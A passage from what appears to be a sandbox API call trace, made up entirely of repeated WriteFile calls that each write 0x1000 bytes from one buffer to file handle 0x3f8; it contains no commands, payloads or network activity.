lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.122] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.122] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.122] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.123] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.123] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.123] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.123] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.124] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.124] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.124] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.124] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.125] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.125] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.125] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.125] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.125] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.126] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.126] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.126] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.126] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.127] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.127] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.127] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.127] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.128] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.128] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.128] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.128] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.129] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.129] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.129] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.129] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.129] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.130] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.130] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.130] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.130] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.131] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.131] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.131] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.131] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.157] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.158] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.158] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.158] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.158] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.159] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.159] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.159] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.159] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.159] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.160] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.160] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.160] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.160] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.161] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.161] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.161] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.162] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.162] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.162] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.162] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.162] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.162] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.163] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.163] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.163] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.163] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.164] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.164] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.164] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.164] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.164] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.164] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.165] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.165] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.165] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.165] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.165] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.165] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.166] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.166] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.166] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.166] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.166] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.166] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.167] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.167] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.167] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.167] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.167] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.168] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.168] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.168] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.168] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.168] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, 